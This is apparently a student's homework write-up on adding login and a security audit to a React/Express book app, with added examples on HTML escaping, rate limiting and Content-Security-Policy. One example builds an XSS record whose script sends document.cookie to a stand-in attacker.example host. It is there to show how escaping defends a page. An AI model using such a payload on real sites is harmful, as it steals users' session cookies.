UI

UI Login/Authentication: I struggled with accessing/sharing the cookies between the front-end and the back-end. Adding the UI itself wasn't difficult using MUI. It was more designing and debugging the endpoints and working with cookies in React that proved difficult. This homework made me realize I handled my cookies wrong during the activity, so it was a good learning experience to get that configured correctly, but it took up some time.

Login Endpoint

Back-end Login/Authentication: Again, handling the cookies proved a challenge on the back-end. This wasn't exactly involved with my new endpoints, but adding a new field to books to help associate them with users for the purpose of authentication took some time and proved to be a challenge to debug.

Security Audit

XSS: I assessed that my app does have XSS vulnerabilities due to the various forms involved as well as the table that displays data. The table is especially vulnerable to displaying malicious scripts inputted by attackers that the browser could run. I'm going to be honest and admit I ran out of time implementing my complete solution and only got to include the Content Security Policy headers, so the rest is not included in my submission, but the plan was to use DOMPurify to help sanitize all of the malicious injected HTML and convert it into something harmless. I spent way too much time configuring my deployment, which in itself was a learning experience with all the errors I had to navigate.
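The table problem described above, as an added example that is not part of the homework submission: a book row rendered by string concatenation beside the same row rendered with HTML escaping. The book record is constructed to look like what an attacker could type into the add-book form, and the `attacker.example` host is hypothetical. DOMPurify, which the write-up planned to use, is the right tool when stored HTML has to stay HTML; for plain-text cells like title and author, escaping the five structural characters is the whole fix.

```javascript
// Added example (not the homework's code): a book row rendered by string
// concatenation versus one rendered with HTML escaping. The book record is
// constructed to look like what an attacker could submit through an add-book form.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that can change HTML structure, so the browser
// shows the attacker's text instead of parsing it as markup.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: field values are dropped straight into the markup.
// In React this corresponds to dangerouslySetInnerHTML fed unsanitised data.
function renderRowUnsafe(book) {
  return `<tr><td>${book.title}</td><td>${book.author}</td></tr>`;
}

// Hardened: every untrusted value is escaped before it reaches the markup.
function renderRowSafe(book) {
  return `<tr><td>${escapeHtml(book.title)}</td><td>${escapeHtml(book.author)}</td></tr>`;
}

// Constructed malicious record (hypothetical attacker.example host).
const MALICIOUS_BOOK = {
  title: '<img src=x onerror="alert(document.cookie)">',
  author: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
};

// Does the rendered row contain any tag beyond the table's own <tr>/<td>?
// A crude check, used only to make the difference between the two renderers visible.
function containsInjectedTag(html) {
  const withoutTableTags = html.replace(/<\/?t[rd]>/g, '');
  return /<[a-z!/]/i.test(withoutTableTags);
}

function demo() {
  return {
    unsafe: containsInjectedTag(renderRowUnsafe(MALICIOUS_BOOK)),
    safe: containsInjectedTag(renderRowSafe(MALICIOUS_BOOK)),
  };
}

console.log(renderRowSafe(MALICIOUS_BOOK));
console.log(demo()); // { unsafe: true, safe: false }
```

Two things worth noticing. JSX text children (`<TableCell>{book.title}</TableCell>`) already go through the equivalent of `renderRowSafe`; the unsafe path in a React app is `dangerouslySetInnerHTML`, which is where DOMPurify belongs. And a Content-Security-Policy whose `script-src` omits `'unsafe-inline'` blocks both the inline `<script>` and the `onerror` handler in the constructed record, which is why the header the submission does ship is useful defence in depth even before the output is escaped; it is not a substitute for escaping, since an attacker who finds an allowed script source or a CSP gap is back to the unsafe case.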

CSRF: I assessed that my app is not vulnerable to CSRF attacks due to the nature of my endpoints. None of them, besides simple GET endpoints that respond with resources and require no authentication, require only the user's cookies to successfully process a request. My endpoints require other forms of input like a req.body, which cannot be injected into a URL as far as I know.

Implemented Security Features: My above answers do not mean I implemented nothing for security beyond authentication. I successfully added rate-limiting with express-rate-limit to display an error after 100 requests per 10 minutes, which prevents attempts to endlessly brute-force a password. I also included helmet to add the Content-Security-Policy header for all requests, which is important to protect against attacks like XSS because it controls what JavaScript a document can load (preventing the execution of malicious JavaScript).
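The two controls in the paragraph above, as an added example that is not the submission's code and not the libraries' code either: a fixed-window limiter with the same 100-requests-per-10-minutes setting (what express-rate-limit's `windowMs` and `max` options configure), and a Content-Security-Policy header of the kind helmet sets, both re-implemented with Node built-ins so the behaviour can be read and run in isolation. The login handler, the `203.0.113.7` client address, the credentials and the policy directives are all constructed for the demo; the policy is one reasonable choice for a same-origin React front-end, not helmet's default.

```javascript
// Added example (not the homework's code): the behaviour behind express-rate-limit's
// windowMs/max settings and helmet's Content-Security-Policy header, re-implemented
// with Node built-ins only so it can be read and run in isolation.

const WINDOW_MS = 10 * 60 * 1000; // 10 minutes, matching the write-up
const MAX_REQUESTS = 100;         // 100 requests per window per client key

// Fixed-window counter keyed by client (here the IP). `now` is injectable so the
// window expiry can be exercised without waiting ten minutes.
function createRateLimiter({ windowMs = WINDOW_MS, max = MAX_REQUESTS, now = Date.now } = {}) {
  const buckets = new Map(); // key -> { count, resetAt }
  return function check(key) {
    const t = now();
    let bucket = buckets.get(key);
    if (!bucket || t >= bucket.resetAt) {
      bucket = { count: 0, resetAt: t + windowMs }; // new window: counter starts over
      buckets.set(key, bucket);
    }
    bucket.count += 1;
    const allowed = bucket.count <= max;
    return {
      allowed,
      remaining: Math.max(0, max - bucket.count),
      retryAfterSeconds: allowed ? 0 : Math.ceil((bucket.resetAt - t) / 1000),
    };
  };
}

// Assumed policy for a same-origin front-end: scripts only from our own origin,
// no plugins, no framing. Not helmet's defaults, just one reasonable policy.
const CSP_DIRECTIVES = {
  'default-src': ["'self'"],
  'script-src': ["'self'"],
  'object-src': ["'none'"],
  'base-uri': ["'self'"],
  'frame-ancestors': ["'none'"],
};

function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, values]) => `${name} ${values.join(' ')}`)
    .join('; ');
}

// Hypothetical login handler shaped like an Express route: the limiter runs first,
// the CSP header goes on every response, and a rejected attempt gets a 429 with Retry-After.
function handleLogin(limiter, req) {
  const headers = { 'Content-Security-Policy': buildCsp(CSP_DIRECTIVES) };
  const verdict = limiter(req.ip);
  if (!verdict.allowed) {
    headers['Retry-After'] = String(verdict.retryAfterSeconds);
    return { status: 429, headers, body: 'Too many login attempts, try again later' };
  }
  // A real password check would go here; constructed credentials for the demo.
  const ok = req.body.username === 'alice' && req.body.password === 'correct horse';
  return { status: ok ? 200 : 401, headers, body: ok ? 'logged in' : 'invalid credentials' };
}

// Simulate a single IP guessing `attempts` passwords inside one window and report
// how many guesses were actually checked before the limiter cut in.
function simulateBruteForce(attempts, clock) {
  const limiter = createRateLimiter({ now: clock });
  let checked = 0;
  let firstBlockedAt = null;
  for (let i = 1; i <= attempts; i += 1) {
    const res = handleLogin(limiter, { ip: '203.0.113.7', body: { username: 'alice', password: `guess${i}` } });
    if (res.status === 429) {
      if (firstBlockedAt === null) firstBlockedAt = i;
    } else {
      checked += 1;
    }
  }
  return { checked, firstBlockedAt };
}

// Fake clock so the block runs instantly: starts at 0, caller advances it.
function fakeClock() {
  let t = 0;
  const clock = () => t;
  clock.advance = (ms) => { t += ms; };
  return clock;
}

console.log(simulateBruteForce(150, fakeClock())); // { checked: 100, firstBlockedAt: 101 }
```

The simulation shows the limiter doing exactly what the paragraph wants: 100 guesses get checked, the 101st and everything after it inside the window get a 429. Two caveats a reviewer would raise. Keying on the client IP alone slows one attacker down but not one that rotates addresses, and it can lock out a whole office behind one NAT, so a per-account counter (failed attempts per username) is the usual complement for a login route. And the fixed window resets all at once, so a client can burst 100 requests at the end of one window and 100 more at the start of the next; that is fine for brute-force protection but worth knowing if the same limiter is reused for other endpoints.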